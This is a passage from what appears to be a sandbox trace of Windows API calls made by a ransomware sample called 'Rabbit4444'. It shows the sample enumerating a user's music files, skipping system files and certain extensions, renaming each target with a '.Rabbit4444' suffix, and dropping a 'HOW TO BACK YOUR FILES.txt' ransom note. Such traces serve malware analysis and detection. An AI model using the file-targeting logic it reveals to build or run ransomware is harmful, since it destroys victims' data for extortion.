(lpString1=".mp3", lpString2=".sys") returned -1 [0049.119] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP\\SiPc-hdOB.mp3" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\hg6ypigphsr-xrigigp\\sipc-hdob.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.119] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.119] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14042999145) returned 1 [0049.119] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=65358) returned 1 [0049.119] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0049.119] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0049.119] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10250, lpName=0x0) returned 0x298 [0049.120] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10250) returned 0x70000 [0049.122] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.122] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0049.122] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.122] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0049.122] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.122] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0049.122] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.122] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0049.122] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14043276982) returned 1 [0049.122] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0049.122] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0049.122] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.123] CloseHandle (hObject=0x298) returned 1 [0049.123] CloseHandle (hObject=0x278) returned 1 [0049.125] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP\\SiPc-hdOB.mp3.Rabbit4444") returned 73 [0049.126] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP\\SiPc-hdOB.mp3" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\hg6ypigphsr-xrigigp\\sipc-hdob.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP\\SiPc-hdOB.mp3.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\hg6ypigphsr-xrigigp\\sipc-hdob.mp3.rabbit4444"), dwFlags=0x1) returned 1 [0049.126] InterlockedExchangeAdd (in: Addend=0xff618, Value=65360 | out: Addend=0xff618) returned 19862848 [0049.126] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3482 [0049.126] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93aa2cf0, ftCreationTime.dwHighDateTime=0x1d4d0ad, ftLastAccessTime.dwLowDateTime=0x658bb10, ftLastAccessTime.dwHighDateTime=0x1d4ccf1, ftLastWriteTime.dwLowDateTime=0x658bb10, ftLastWriteTime.dwHighDateTime=0x1d4ccf1, nFileSizeHigh=0x0, nFileSizeLow=0xff4e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SiPc-hdOB.mp3", cAlternateFileName="SIPC-H~1.MP3")) returned 0 [0049.126] FindClose (in: hFindFile=0x102590 | out: hFindFile=0x102590) returned 1 [0049.126] lstrcpyW (in: lpString1=0x130eb9a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.126] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\hg6ypigphsr-xrigigp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0049.126] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0049.127] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0049.128] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.128] CloseHandle (hObject=0x278) returned 1 [0049.128] CloseHandle (hObject=0x27c) returned 1 [0049.129] GetCurrentThreadId () returned 0xd98 [0049.129] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf63b0 [0049.129] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG") returned="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG" [0049.129] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1158c8 | out: hHeap=0xe0000) returned 1 [0049.129] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf63a8 | out: hHeap=0xe0000) returned 1 [0049.129] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG" | out: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG") returned="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG" [0049.129] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\") returned="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\" [0049.129] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\.BFC0E91B00AE8A0620D3" [0049.129] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\0s8c98izi8qyg\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0049.130] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0049.133] FlushFileBuffers (hFile=0x27c) returned 1 [0049.134] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.134] CloseHandle (hObject=0x27c) returned 1 [0049.135] lstrlenW (lpString="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG") returned 42 [0049.135] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.135] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5cb3abf0, ftCreationTime.dwHighDateTime=0x1d4cbf2, ftLastAccessTime.dwLowDateTime=0x81984330, ftLastAccessTime.dwHighDateTime=0x1d4c78e, ftLastWriteTime.dwLowDateTime=0xe69b83ff, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0049.135] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.135] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.135] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0049.135] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0049.135] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5cb3abf0, ftCreationTime.dwHighDateTime=0x1d4cbf2, ftLastAccessTime.dwLowDateTime=0x81984330, ftLastAccessTime.dwHighDateTime=0x1d4c78e, ftLastWriteTime.dwLowDateTime=0xe69b83ff, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.135] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.135] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.135] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0049.135] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.135] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.135] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe69b83ff, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe69b83ff, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe69b83ff, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.135] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.135] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.135] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aadd250, ftCreationTime.dwHighDateTime=0x1d4d188, ftLastAccessTime.dwLowDateTime=0xfabcc0c0, ftLastAccessTime.dwHighDateTime=0x1d4cac1, ftLastWriteTime.dwLowDateTime=0xfabcc0c0, ftLastWriteTime.dwHighDateTime=0x1d4cac1, nFileSizeHigh=0x0, nFileSizeLow=0x7bec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2kQpVkJLVFCbCOvx.m4a", cAlternateFileName="2KQPVK~1.M4A")) returned 1 [0049.135] lstrcmpiW (lpString1="2kQpVkJLVFCbCOvx.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.135] lstrcmpiW (lpString1="2kQpVkJLVFCbCOvx.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.135] lstrcmpiW (lpString1="2kQpVkJLVFCbCOvx.m4a", lpString2="Rabbit4444.exe") returned -1 [0049.135] lstrcmpiW (lpString1="2kQpVkJLVFCbCOvx.m4a", lpString2=".") returned 1 [0049.136] lstrcmpiW (lpString1="2kQpVkJLVFCbCOvx.m4a", lpString2="..") returned 1 [0049.136] lstrcmpiW (lpString1="2kQpVkJLVFCbCOvx.m4a", lpString2="windows") returned -1 [0049.136] lstrcmpiW (lpString1="2kQpVkJLVFCbCOvx.m4a", lpString2="bootmgr") returned -1 [0049.136] lstrcmpiW (lpString1="2kQpVkJLVFCbCOvx.m4a", lpString2="pagefile.sys") returned -1 [0049.136] lstrcmpiW (lpString1="2kQpVkJLVFCbCOvx.m4a", lpString2="boot") returned -1 [0049.136] lstrcmpiW (lpString1="2kQpVkJLVFCbCOvx.m4a", lpString2="ids.txt") returned -1 [0049.136] lstrcmpiW (lpString1="2kQpVkJLVFCbCOvx.m4a", lpString2="NTUSER.DAT") returned -1 [0049.136] lstrcpyW (in: lpString1=0x130eb8e, lpString2="2kQpVkJLVFCbCOvx.m4a" | out: lpString1="2kQpVkJLVFCbCOvx.m4a") returned="2kQpVkJLVFCbCOvx.m4a" [0049.136] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\2kQpVkJLVFCbCOvx.m4a", dwFileAttributes=0x0) returned 1 [0049.136] lstrlenW (lpString="2kQpVkJLVFCbCOvx.m4a") returned 20 [0049.136] lstrlenW (lpString="Rabbit4444") returned 10 [0049.136] lstrcmpiW (lpString1="CbCOvx.m4a", lpString2="Rabbit4444") returned -1 [0049.136] lstrlenW (lpString=".dll") returned 4 [0049.136] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0049.136] lstrlenW (lpString=".lnk") returned 4 [0049.136] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0049.136] lstrlenW (lpString=".ini") returned 4 [0049.136] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0049.136] lstrlenW (lpString=".sys") returned 4 [0049.136] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0049.136] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\2kQpVkJLVFCbCOvx.m4a" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\0s8c98izi8qyg\\2kqpvkjlvfcbcovx.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.136] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.136] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14044713868) returned 1 [0049.136] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=31724) returned 1 [0049.136] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0049.137] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0049.137] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7ef0, lpName=0x0) returned 0x298 [0049.137] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7ef0) returned 0x70000 [0049.138] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.138] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0049.138] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.138] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0049.138] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.138] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0049.138] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.138] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0049.138] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14044883612) returned 1 [0049.138] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0049.138] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0049.138] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.139] CloseHandle (hObject=0x298) returned 1 [0049.139] CloseHandle (hObject=0x278) returned 1 [0049.141] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\2kQpVkJLVFCbCOvx.m4a.Rabbit4444") returned 74 [0049.141] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\2kQpVkJLVFCbCOvx.m4a" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\0s8c98izi8qyg\\2kqpvkjlvfcbcovx.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\2kQpVkJLVFCbCOvx.m4a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\0s8c98izi8qyg\\2kqpvkjlvfcbcovx.m4a.rabbit4444"), dwFlags=0x1) returned 1 [0049.144] InterlockedExchangeAdd (in: Addend=0xff618, Value=31728 | out: Addend=0xff618) returned 19928208 [0049.144] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3484 [0049.144] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bc06350, ftCreationTime.dwHighDateTime=0x1d4d3c3, ftLastAccessTime.dwLowDateTime=0xd3f75180, ftLastAccessTime.dwHighDateTime=0x1d4cde6, ftLastWriteTime.dwLowDateTime=0xd3f75180, ftLastWriteTime.dwHighDateTime=0x1d4cde6, nFileSizeHigh=0x0, nFileSizeLow=0x18a07, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aW4QN.mp3", cAlternateFileName="")) returned 1 [0049.145] lstrcmpiW (lpString1="aW4QN.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.145] lstrcmpiW (lpString1="aW4QN.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.145] lstrcmpiW (lpString1="aW4QN.mp3", lpString2="Rabbit4444.exe") returned -1 [0049.145] lstrcmpiW (lpString1="aW4QN.mp3", lpString2=".") returned 1 [0049.145] lstrcmpiW (lpString1="aW4QN.mp3", lpString2="..") returned 1 [0049.145] lstrcmpiW (lpString1="aW4QN.mp3", lpString2="windows") returned -1 [0049.145] lstrcmpiW (lpString1="aW4QN.mp3", lpString2="bootmgr") returned -1 [0049.145] lstrcmpiW (lpString1="aW4QN.mp3", lpString2="pagefile.sys") returned -1 [0049.145] lstrcmpiW (lpString1="aW4QN.mp3", lpString2="boot") returned -1 [0049.145] lstrcmpiW (lpString1="aW4QN.mp3", lpString2="ids.txt") returned -1 [0049.145] lstrcmpiW (lpString1="aW4QN.mp3", lpString2="NTUSER.DAT") returned -1 [0049.145] lstrcpyW (in: lpString1=0x130eb8e, lpString2="aW4QN.mp3" | out: lpString1="aW4QN.mp3") returned="aW4QN.mp3" [0049.145] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\aW4QN.mp3", dwFileAttributes=0x0) returned 1 [0049.145] lstrlenW (lpString="aW4QN.mp3") returned 9 [0049.145] lstrlenW (lpString="Rabbit4444") returned 10 [0049.145] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0049.145] lstrlenW (lpString=".dll") returned 4 [0049.145] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0049.145] lstrlenW (lpString=".lnk") returned 4 [0049.145] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0049.145] lstrlenW (lpString=".ini") returned 4 [0049.145] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0049.145] lstrlenW (lpString=".sys") returned 4 [0049.145] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0049.145] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\aW4QN.mp3" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\0s8c98izi8qyg\\aw4qn.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.146] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.146] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14045630266) returned 1 [0049.146] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=100871) returned 1 [0049.146] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0049.146] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101f30 [0049.146] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18d10, lpName=0x0) returned 0x298 [0049.146] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18d10) returned 0x70000 [0049.148] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.148] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0049.148] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.148] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0049.148] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.149] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0049.149] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.149] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0049.149] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14045935932) returned 1 [0049.149] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0049.149] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101f30 | out: hHeap=0xe0000) returned 1 [0049.149] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.150] CloseHandle (hObject=0x298) returned 1 [0049.150] CloseHandle (hObject=0x278) returned 1 [0049.153] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\aW4QN.mp3.Rabbit4444") returned 63 [0049.154] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\aW4QN.mp3" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\0s8c98izi8qyg\\aw4qn.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\aW4QN.mp3.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\0s8c98izi8qyg\\aw4qn.mp3.rabbit4444"), dwFlags=0x1) returned 1 [0049.154] InterlockedExchangeAdd (in: Addend=0xff618, Value=100880 | out: Addend=0xff618) returned 19959936 [0049.154] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 3485 [0049.154] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb187ee0, ftCreationTime.dwHighDateTime=0x1d4d491, ftLastAccessTime.dwLowDateTime=0x99c39dc0, ftLastAccessTime.dwHighDateTime=0x1d4d269, ftLastWriteTime.dwLowDateTime=0x99c39dc0, ftLastWriteTime.dwHighDateTime=0x1d4d269, nFileSizeHigh=0x0, nFileSizeLow=0x4804, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G_JtWgQVBTJ7M2pd_.m4a", cAlternateFileName="G_JTWG~1.M4A")) returned 1 [0049.155] lstrcmpiW (lpString1="G_JtWgQVBTJ7M2pd_.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.155] lstrcmpiW (lpString1="G_JtWgQVBTJ7M2pd_.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.155] lstrcmpiW (lpString1="G_JtWgQVBTJ7M2pd_.m4a", lpString2="Rabbit4444.exe") returned -1 [0049.155] lstrcmpiW (lpString1="G_JtWgQVBTJ7M2pd_.m4a", lpString2=".") returned 1 [0049.155] lstrcmpiW (lpString1="G_JtWgQVBTJ7M2pd_.m4a", lpString2="..") returned 1 [0049.155] lstrcmpiW (lpString1="G_JtWgQVBTJ7M2pd_.m4a", lpString2="windows") returned -1 [0049.155] lstrcmpiW (lpString1="G_JtWgQVBTJ7M2pd_.m4a", lpString2="bootmgr") returned 1 [0049.155] lstrcmpiW (lpString1="G_JtWgQVBTJ7M2pd_.m4a", lpString2="pagefile.sys") returned -1 [0049.155] lstrcmpiW (lpString1="G_JtWgQVBTJ7M2pd_.m4a", lpString2="boot") returned 1 [0049.155] lstrcmpiW (lpString1="G_JtWgQVBTJ7M2pd_.m4a", lpString2="ids.txt") returned -1 [0049.155] lstrcmpiW (lpString1="G_JtWgQVBTJ7M2pd_.m4a", lpString2="NTUSER.DAT") returned -1 [0049.155] lstrcpyW (in: lpString1=0x130eb8e, lpString2="G_JtWgQVBTJ7M2pd_.m4a" | out: lpString1="G_JtWgQVBTJ7M2pd_.m4a") returned="G_JtWgQVBTJ7M2pd_.m4a" [0049.155] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\G_JtWgQVBTJ7M2pd_.m4a", dwFileAttributes=0x0) returned 1 [0049.155] lstrlenW (lpString="G_JtWgQVBTJ7M2pd_.m4a") returned 21 [0049.155] lstrlenW (lpString="Rabbit4444") returned 10 [0049.155] lstrcmpiW (lpString1="7M2pd_.m4a", lpString2="Rabbit4444") returned -1 [0049.155] lstrlenW (lpString=".dll") returned 4 [0049.155] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0049.155] lstrlenW (lpString=".lnk") returned 4 [0049.155] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0049.155] lstrlenW (lpString=".ini") returned 4 [0049.155] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0049.155] lstrlenW (lpString=".sys") returned 4 [0049.155] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0049.155] CreateFileW 